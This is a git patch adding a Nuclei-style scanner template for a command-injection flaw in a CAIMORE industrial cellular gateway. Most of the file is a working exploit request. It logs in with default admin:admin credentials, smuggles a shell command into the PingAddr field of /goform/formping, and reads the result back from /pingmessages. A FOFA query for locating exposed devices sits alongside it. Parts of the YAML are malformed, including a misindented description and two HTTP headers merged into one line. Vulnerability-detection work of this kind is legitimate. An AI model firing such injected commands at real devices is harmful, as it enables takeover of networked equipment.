From 0bdb7cf4cecb8fbe5fb25e491c32e551b258c6fe Mon Sep 17 00:00:00 2001
From: momika233 <56291820+momika233@users.noreply.github.com>
Date: Thu, 10 Aug 2023 22:30:03 +0800
Subject: [PATCH] Add files via upload

---
 http/vulnerabilities/CAIMORE-Gateway-RCE.yaml | 50 +++++++++++++++++++
 1 file changed, 50 insertions(+)
 create mode 100644 http/vulnerabilities/CAIMORE-Gateway-RCE.yaml

diff --git a/http/vulnerabilities/CAIMORE-Gateway-RCE.yaml b/http/vulnerabilities/CAIMORE-Gateway-RCE.yaml
new file mode 100644
index 0000000000..4c87bba1a2
--- /dev/null
+++ b/http/vulnerabilities/CAIMORE-Gateway-RCE.yaml
@@ -0,0 +1,50 @@
+id: CAIMORE-Gateway-RCE
+
+info:
+  name: CAIMORE-Gateway-RCE
+  author: momika233
+  severity: high
+  reference:
+    - https://github.com/momika233
+    description: |
+    The gateway of Xiamen Caimao Communication Technology Co., Ltd. is designed with open software architecture. It is a metal shell design, with two Ethernet RJ45 interfaces, and an industrial design wireless gateway using 3G/4G/5G wide area network for Internet communication. There is a command execution vulnerability in the formping file of the gateway of Xiamen Caimao Communication Technology Co., Ltd. An attacker can use this vulnerability to arbitrarily execute code on the server side, write to the back door, obtain server permissions, and then control the entire web server.
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: app="CAIMORE-Gateway"
+
+  tags: CAIMORE-Gateway,RCE
+
+
+requests:
+  - raw:
+      - |
+        POST /goform/formping HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+        Connection: closeContent-Length: 63
+        Authorization: Basic YWRtaW46YWRtaW4=
+        Accept-Encoding: gzip
+
+        PingAddr=127.0.0.1%7Cecho%20momika233&PingPackNumb=1&PingMsg=
+
+      - |
+
+        GET /pingmessages HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+        Connection: close
+        Authorization: Basic YWRtaW46YWRtaW4=
+        Accept-Encoding: gzip
+
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "momika233"
+        part: body
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file